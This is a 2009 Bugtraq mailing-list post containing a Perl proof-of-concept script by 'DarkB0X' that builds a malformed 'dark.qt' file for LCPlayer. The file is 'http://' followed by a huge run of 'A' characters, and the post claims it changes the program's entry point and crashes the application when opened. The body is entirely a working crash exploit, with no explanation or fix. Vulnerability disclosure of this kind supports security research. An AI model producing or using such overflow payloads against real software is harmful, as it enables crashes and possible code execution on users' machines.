[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
LCPlayer (.qt file) EOP change PoC (app crash)
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: LCPlayer (.qt file) EOP change PoC (app crash)
- From: darkb0x97@xxxxxxxxxxxxxx
- Date: 4 Feb 2009 19:08:03 -0000
#!/usr/bin/perl -w
#By DarkB0X
#HomePage : http://NullArea.Net
#contact : darkb0x97@xxxxxxxxxxxxxx
#after loading the file click on it in the program
#entry point will change and the app will crash
my $file = "dark.qt" ;
my $poc="http://"."A" x 0265487 ;
open(b0x, ">>$file") or die "Cannot open $file";
print b0x $poc;
close(b0x);
print "\n[+] done ! , $file created";